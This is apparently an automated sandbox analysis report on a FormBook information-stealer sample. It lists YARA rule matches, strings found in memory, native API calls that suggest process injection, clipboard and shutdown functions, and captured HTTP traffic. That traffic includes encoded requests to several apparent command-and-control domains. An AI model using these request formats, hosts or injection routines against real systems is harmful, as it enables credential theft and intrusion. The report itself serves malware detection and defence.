Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/rene
Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sedo.com/services/parking.php3
Source: unknown HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
Source: unknown DNS traffic detected: queries for: www.white-hat.uk
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1Host: www.un-object.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00410331 1_2_00410331
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A408B7 1_2_00A408B7
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_00A40A3B 1_2_00A40A3B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040C043 3_2_0040C043
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00405873 3_2_00405873
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401824 3_2_00401824
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401830 3_2_00401830
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0040C03E 3_2_0040C03E
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_004038F3 3_2_004038F3
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00422A4C 3_2_00422A4C
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00401BD0 3_2_00401BD0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00405653 3_2_00405653
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00420753 3_2_00420753
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009BB090 3_2_009BB090
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A61002 3_2_00A61002
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009AF900 3_2_009AF900
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C4120 3_2_009C4120
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009DEBB0 3_2_009DEBB0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009B841F 3_2_009B841F
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009A0D20 3_2_009A0D20
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_00A71D55 3_2_00A71D55
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009C6E30 3_2_009C6E30
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: String function: 00401980 appears 42 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E833 NtAllocateVirtualMemory, 3_2_0041E833
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E653 NtCreateFile, 3_2_0041E653
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E703 NtReadFile, 3_2_0041E703
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_0041E783 NtClose, 3_2_0041E783
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_009E98F0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9840 NtDelayExecution,LdrInitializeThunk, 3_2_009E9840
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_009E9860
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E99A0 NtCreateSection,LdrInitializeThunk, 3_2_009E99A0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_009E9910
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_009E9A00
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A20 NtResumeThread,LdrInitializeThunk, 3_2_009E9A20
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A50 NtCreateFile,LdrInitializeThunk, 3_2_009E9A50
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E95D0 NtClose,LdrInitializeThunk, 3_2_009E95D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9540 NtReadFile,LdrInitializeThunk, 3_2_009E9540
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_009E96E0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_009E9660
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_009E9780
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_009E97A0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_009E9FE0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_009E9710
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E98A0 NtWriteVirtualMemory, 3_2_009E98A0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9820 NtEnumerateKey, 3_2_009E9820
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EB040 NtSuspendThread, 3_2_009EB040
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E99D0 NtCreateProcessEx, 3_2_009E99D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9950 NtQueueApcThread, 3_2_009E9950
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A80 NtOpenDirectoryObject, 3_2_009E9A80
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9A10 NtQuerySection, 3_2_009E9A10
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA3B0 NtGetContextThread, 3_2_009EA3B0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9B00 NtSetValueKey, 3_2_009E9B00
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E95F0 NtQueryInformationFile, 3_2_009E95F0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EAD30 NtSetContextThread, 3_2_009EAD30
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9520 NtWaitForSingleObject, 3_2_009E9520
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9560 NtWriteFile, 3_2_009E9560
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E96D0 NtCreateKey, 3_2_009E96D0
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9610 NtEnumerateValueKey, 3_2_009E9610
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9650 NtQueryValueKey, 3_2_009E9650
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9670 NtQueryInformationProcess, 3_2_009E9670
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA710 NtOpenProcessToken, 3_2_009EA710
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9730 NtQueryVirtualMemory, 3_2_009E9730
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9770 NtSetInformationFile, 3_2_009E9770
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009EA770 NtOpenThread, 3_2_009EA770
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 3_2_009E9760 NtOpenProcess, 3_2_009E9760
